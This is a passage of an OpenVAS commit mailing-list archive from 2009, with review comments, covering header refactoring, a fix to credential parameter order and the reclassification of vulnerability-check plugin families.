@@ -53,7 +53,6 @@ cd nasl && ${MAKE} install cd omp && ${MAKE} install - $(INSTALL) -m 0444 include/libopenvas.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/nvt_categories.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/libvers.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/arglists.h $(DESTDIR)${includedir}/openvas Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 10:23:51 UTC (rev 5369) @@ -32,50 +32,3 @@ * \section copying License Information * \verbinclude COPYING */ - -#ifndef _LIBOPENVAS_H -#define _LIBOPENVAS_H - -#ifndef ExtFunc -#define ExtFunc -#endif - - -#include "arglists.h" -#include "bpf_share.h" -#include "ftp_funcs.h" -#include "kb.h" -#include "network.h" -#include "pcap_openvas.h" -#include "plugutils.h" -#include "popen.h" -#include "proctitle.h" -#include "rand.h" -#include "resolve.h" -#include "scanners_utils.h" -#include "services1.h" -#include "share_fd.h" -#include "store.h" -#include "system.h" -#include "www_funcs.h" - - -/** - * Plugin standard function template to init a plugin (nasl/nes/oval). - */ -typedef int(*plugin_init_t)(struct arglist *); -/** - * Plugin standard function template to run a plugin (nasl/nes/oval). - */ -typedef int(*plugin_run_t)(struct arglist *); - - -/* Plugin preference types (influence gui in client) */ -#define PREF_CHECKBOX "checkbox" -#define PREF_ENTRY "entry" -#define PREF_RADIO "radio" -#define PREF_PASSWORD "password" -#define PREF_FILE "file" -/*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ - -#endif /* _LIBOPENVAS_H */ From scm-commit at wald.intevation.org Mon Oct 5 12:27:25 2009 
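Review bot: the Makefile hunk of r5369 drops the install line for include/libopenvas.h, but nothing removes a copy already placed in $(DESTDIR)${includedir}/openvas by an earlier install, so code that still has #include "libopenvas.h" can keep compiling against the stale header with its old definitions and hide missing includes. The scanner sources are only converted in the following revision (r5370 removes the include from find_service.c, nes_plugins.c, openvassd.c, oval_plugins.c and utils.c), so it would be safer to land that conversion first, or to remove the installed header explicitly. Since the file is kept in the tree as documentation only, a short comment at its top saying it is no longer an include file would also help.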
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:27:25 +0200 (CEST) Subject: [Openvas-commits] r5370 - in trunk/openvas-scanner: . cnvts/find_service openvassd Message-ID: <20091005102725.54B52865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 12:27:24 +0200 (Mon, 05 Oct 2009) New Revision: 5370 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/find_service/find_service.c trunk/openvas-scanner/openvassd/nes_plugins.c trunk/openvas-scanner/openvassd/openvassd.c trunk/openvas-scanner/openvassd/oval_plugins.c trunk/openvas-scanner/openvassd/pluginload.h trunk/openvas-scanner/openvassd/utils.c Log: Removed dependence on libopenvas.h. * cnvts/find_service/find_service.c: Added includes and defines that previously were in libopenvas.h. * openvassd/pluginload.h: Added function typedefs that were previously in libopenvas.h. * openvassd/nes_plugins.c, openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: Removed libopenvas-include, added missing includes. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 10:27:24 UTC (rev 5370) 
@@ -1,5 +1,19 @@ 2009-10-05 Felix Wolfsteller + Removed dependence on libopenvas.h. + + * cnvts/find_service/find_service.c: Added includes and defines that + previously were in libopenvas.h. + + * openvassd/pluginload.h: Added function typedefs that were previously + in libopenvas.h. + + * openvassd/nes_plugins.c, openvassd/openvassd.c, + openvassd/oval_plugins.c, openvassd/utils.c: Removed libopenvas-include, + added missing includes. + +2009-10-05 Felix Wolfsteller + * cnvts/synscan/synscan.c, openvassd/save_tests.c, openvassd/nasl_plugins.c: Added missing includes. Modified: trunk/openvas-scanner/cnvts/find_service/find_service.c =================================================================== --- trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -9,11 +9,12 @@ #include -#include "libopenvas.h" - #include /* for struct arglist */ +#include /* for plug_get_oldstyle_kb */ +#include /* for get_encaps_through */ #include /* for ACT_SCANNER */ #include /* for OPENVAS_ENCAPS_IP */ +#include /* for efree */ #include @@ -48,6 +49,13 @@ #define NUM_CHILDREN "Number of connections done in parallel : " +/* Plugin preference types (influence gui in client) */ +#define PREF_CHECKBOX "checkbox" +#define PREF_ENTRY "entry" +#define PREF_RADIO "radio" +#define PREF_PASSWORD "password" +#define PREF_FILE "file" +/*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ int plugin_init(desc) Modified: trunk/openvas-scanner/openvassd/nes_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 10:27:24 UTC (rev 5370) 
@@ -29,14 +29,18 @@ #include -#include "libopenvas.h" - #include +#include /* for internal_send */ +#include /* for plug_set_path */ +#include /* for store_load_plugin */ +#include /* for emalloc */ + #include "pluginload.h" #include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ #include "log.h" #include "preferences.h" Modified: trunk/openvas-scanner/openvassd/openvassd.c =================================================================== --- trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -43,10 +43,16 @@ #include +#include /* for bpf_server */ #include +#include /* for auth_printf */ #include +#include /* for find_in_path */ +#include /* for store_init */ +#include /* for estrdup */ +#include /* for openvas_init_random */ -#include "libopenvas.h" +#include "proctitle.h" /* for setproctitle.h */ #ifdef USE_LIBWRAP #include Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -31,10 +31,12 @@ #include -#include "libopenvas.h" - +#include +#include /* for internal_send */ #include /* for ACT_END */ -#include +#include /* for plug_set_oid */ +#include /* for store_load_plugin */ +#include /* for emalloc */ #include #include 
@@ -43,6 +45,7 @@ #include "pluginload.h" #include "preferences.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ static void oval_thread (struct arglist *); Modified: trunk/openvas-scanner/openvassd/pluginload.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 10:27:24 UTC (rev 5370) @@ -42,7 +42,18 @@ void plugin_free(struct arglist *); void plugins_free(struct arglist *); + /** + * Plugin standard function template to init a plugin (nasl/nes/oval). + */ +typedef int(*plugin_init_t)(struct arglist *); +/** + * Plugin standard function template to run a plugin (nasl/nes/oval). + */ +typedef int(*plugin_run_t)(struct arglist *); + + +/** * Class of a NVT (implemented as list). * Currently three classes do exist: nes_plugin_class, nasl_plugin_class and * oval_plugin_class. Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-05 10:23:51 UTC (rev 5369) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 10:27:24 UTC (rev 5370) @@ -29,7 +29,9 @@ #include -#include "libopenvas.h" +#include /* for stream_zero */ +#include /* for plug_get_launch */ +#include /* for emalloc */ #include "log.h" #include "ntp.h" From scm-commit at wald.intevation.org Mon Oct 5 12:31:15 2009 
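Review bot: the PREF_* block added to cnvts/find_service/find_service.c in r5370 is a copy of the defines removed from libopenvas.h in r5369, and its own comment says these strings influence the GUI in the client, so they are a shared contract rather than something private to one plugin. Keeping them as a local copy in a .c file means the next plugin that needs a preference type will copy them again and the values can drift apart. A small shared header, in the same way nvt_categories.h was split out for the ACT_* values, would be a better home. The commented-out PREF_SSH_CREDENTIALS line was copied along and could be dropped. Minor: in openvassd.c the comment "for setproctitle.h" names a header where the other comments name the function.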
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:31:15 +0200 (CEST) Subject: [Openvas-commits] r5371 - in trunk/openvas-manager: . src Message-ID: <20091005103115.8E3E3865F49C@pyrosoma.intevation.org> Author: mattm Date: 2009-10-05 12:31:15 +0200 (Mon, 05 Oct 2009) New Revision: 5371 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/ompd.c Log: * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. (serve_omp): Put the credential args the right way round. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-05 10:27:24 UTC (rev 5370) +++ trunk/openvas-manager/ChangeLog 2009-10-05 10:31:15 UTC (rev 5371) @@ -1,5 +1,10 @@ -2009-09-30 Matthew Mundell +2009-10-05 Matthew Mundell + * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. + (serve_omp): Put the credential args the right way round. + +2009-10-03 Matthew Mundell + When parsing the OTP PREFERENCES, read in all the preferences before enabling them, otherwise OMP GET_PREFERENCES might return a partial set of preferences. Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-05 10:27:24 UTC (rev 5370) +++ trunk/openvas-manager/src/ompd.c 2009-10-05 10:31:15 UTC (rev 5371) @@ -449,6 +449,9 @@ g_warning ("%s: failed to set scanner socket flag: %s\n", __FUNCTION__, strerror (errno)); + openvas_server_free (server_socket, + *server_session, + *server_credentials); return -1; } return server_socket; 
@@ -490,8 +493,8 @@ int serve_omp (gnutls_session_t* client_session, gnutls_session_t* scanner_session, + gnutls_certificate_credentials_t* client_credentials, gnutls_certificate_credentials_t* scanner_credentials, - gnutls_certificate_credentials_t* client_credentials, int client_socket, int* scanner_socket_addr) { int nfds, ret; From scm-commit at wald.intevation.org Mon Oct 5 12:46:57 2009 
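Review bot: in the serve_omp hunk of src/ompd.c (r5371) the two parameters whose order is swapped, client_credentials and scanner_credentials, have the same type gnutls_certificate_credentials_t*, so a prototype or call site that still uses the old order compiles without any warning and the two credential sets are silently exchanged. The diff shows only the definition; please confirm that the declaration in the header and every caller were changed in the same revision. Because the compiler cannot catch this class of mistake, consider passing each side's session and credentials together (for example one struct per peer) so the pairing cannot be mixed up again.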
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:46:57 +0200 (CEST) Subject: [Openvas-commits] r5372 - in trunk/openvas-plugins: . scripts Message-ID: <20091005104657.6917785C731B@pyrosoma.intevation.org> Author: chandra Date: 2009-10-05 12:46:42 +0200 (Mon, 05 Oct 2009) New Revision: 5372 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/3com_switches.nasl trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl trunk/openvas-plugins/scripts/apache_conn_block.nasl trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl trunk/openvas-plugins/scripts/apache_server_info.nasl trunk/openvas-plugins/scripts/apache_server_status.nasl trunk/openvas-plugins/scripts/avaya_switches.nasl trunk/openvas-plugins/scripts/aventail_asap.nasl trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl trunk/openvas-plugins/scripts/defaultnavcheck.nasl trunk/openvas-plugins/scripts/fortigate_detect.nasl trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl 
trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl trunk/openvas-plugins/scripts/ident_process_owner.nasl trunk/openvas-plugins/scripts/imss_detect.nasl trunk/openvas-plugins/scripts/iss_deploymanager.nasl trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl trunk/openvas-plugins/scripts/nortel_default_username_password.nasl trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl trunk/openvas-plugins/scripts/notesinicheck.nasl trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl trunk/openvas-plugins/scripts/qpopper2.nasl trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl 
trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl trunk/openvas-plugins/scripts/websense_detect.nasl trunk/openvas-plugins/scripts/webshield_detect.nasl trunk/openvas-plugins/scripts/zyxel_pwd.nasl Log: Updated script family as per CR #23 Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -1,5 +1,69 @@ 2009-10-05 Chandrashekhar B + * scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl, + scripts/fortigate_detect.nasl, + scripts/notesinicheck.nasl, + scripts/gb_vmware_prdts_prv_esc_vuln.nasl, + scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl, + scripts/checkpoint_secureplatform.nasl, + scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl, + scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl, + scripts/secpod_python_mult_vuln_win_900105.nasl, + scripts/zyxel_pwd.nasl, + scripts/smc2804wbr_default_password.nasl, + scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl, + scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl, + scripts/avaya_switches.nasl, + scripts/3com_switches.nasl, + scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl, + scripts/defaultnavcheck.nasl, + scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl, + scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl, + scripts/icecast_avllib_bof.nasl, + scripts/apache_server_info.nasl, + scripts/pop2_unencrypted_cleartext_logins.nasl, + scripts/gb_opera_mult_vuln_oct08_win.nasl, + scripts/webshield_detect.nasl, + scripts/icecast_libshout_bof.nasl, + scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl, + scripts/ident_process_owner.nasl, + scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl, + scripts/limewire_remote_unauth_access.nasl, + scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl, + scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl, + scripts/gb_sun_java_ws_code_exec_vuln_win.nasl, + scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl, + scripts/imss_detect.nasl, + scripts/apache_conn_block.nasl, + scripts/Allied_Telesyn_telnet.nasl, + scripts/DDI_AirConnect_Default_Password.nasl, + scripts/apache_htpasswd_overflow.nasl, + scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl, + scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl, + scripts/gb_seamonkey_mult_vuln_july08_win.nasl, + scripts/aventail_asap.nasl, + 
scripts/apache_server_status.nasl, + scripts/gb_dovecot_mult_sec_bypass_vuln.nasl, + scripts/websense_detect.nasl, + scripts/qpopper2.nasl, + scripts/gb_opera_mult_vuln_oct08_lin.nasl, + scripts/gb_python_imageop_bof_vuln_win.nasl, + scripts/lcdproc_buffer_overflow.nasl, + scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl, + scripts/DDI_LanRover_Blank_Password.nasl, + scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl, + scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl, + scripts/nortel_passport_default_pass.nasl, + scripts/4d_webstar_symb_link.nasl, + scripts/nortel_default_username_password.nasl, + scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl, + scripts/oracle_enterprise_manager.nasl, + scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl, + scripts/iss_deploymanager.nasl: + Updated script family as per CR #23. + +2009-10-05 Chandrashekhar B + * scripts/win_CVE-2008-0080.nasl, scripts/smbcl_CVE-2008-0234.nasl, scripts/win_CVE-2007-0043.nasl, Modified: trunk/openvas-plugins/scripts/3com_switches.nasl =================================================================== --- trunk/openvas-plugins/scripts/3com_switches.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/3com_switches.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2001 Patrik Karlsson"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); Modified: trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl =================================================================== --- trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -41,7 +41,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Remote file access"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80, "Services/ftp", 21); Modified: trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl =================================================================== --- trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 Charles Thier"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); Modified: trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl =================================================================== --- trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2002 Digital Defense Inc."); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("http_version.nasl"); script_require_keys("Services/www"); Modified: trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl =================================================================== --- trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -41,7 +41,7 @@ script_copyright("This script is Copyright (C) 2002 Digital Defense Incorporated"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/apache_conn_block.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_conn_block.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_conn_block.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2004 Scott Shebby"); - family = "Misc."; + family = "Denial of Service"; script_family(family); script_dependencie("http_version.nasl", "os_fingerprint.nasl"); script_require_keys("www/apache"); Modified: trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -49,7 +49,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("http_version.nasl"); script_require_keys("www/apache"); Modified: trunk/openvas-plugins/scripts/apache_server_info.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_server_info.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_server_info.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2001 StrongHoldNet"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/apache_server_status.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_server_status.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_server_status.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2001 StrongHoldNet"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/avaya_switches.nasl =================================================================== --- trunk/openvas-plugins/scripts/avaya_switches.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/avaya_switches.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 Charles Thier"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); } Modified: trunk/openvas-plugins/scripts/aventail_asap.nasl =================================================================== --- trunk/openvas-plugins/scripts/aventail_asap.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/aventail_asap.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -33,7 +33,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/defaultnavcheck.nasl =================================================================== --- trunk/openvas-plugins/scripts/defaultnavcheck.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/defaultnavcheck.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -26,7 +26,7 @@ script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2004 Net-Square Solutions Pvt Ltd."); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/fortigate_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/fortigate_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/fortigate_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports(443); Modified: trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the version of Adobe Flash Player"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_adobe_flash_player_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -65,7 +65,7 @@ script_summary("Check for the version of iPhone Utility"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the version of Dovecot"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) 
@@ -69,7 +69,7 @@ script_summary("Check for the version of OpenOffice"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); script_dependencies("gather-package-list.nasl"); script_require_keys("ssh/login/uname"); exit(0); Modified: trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -65,7 +65,7 @@ script_summary("Check for the version of OpenOffice"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Remote file access"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ 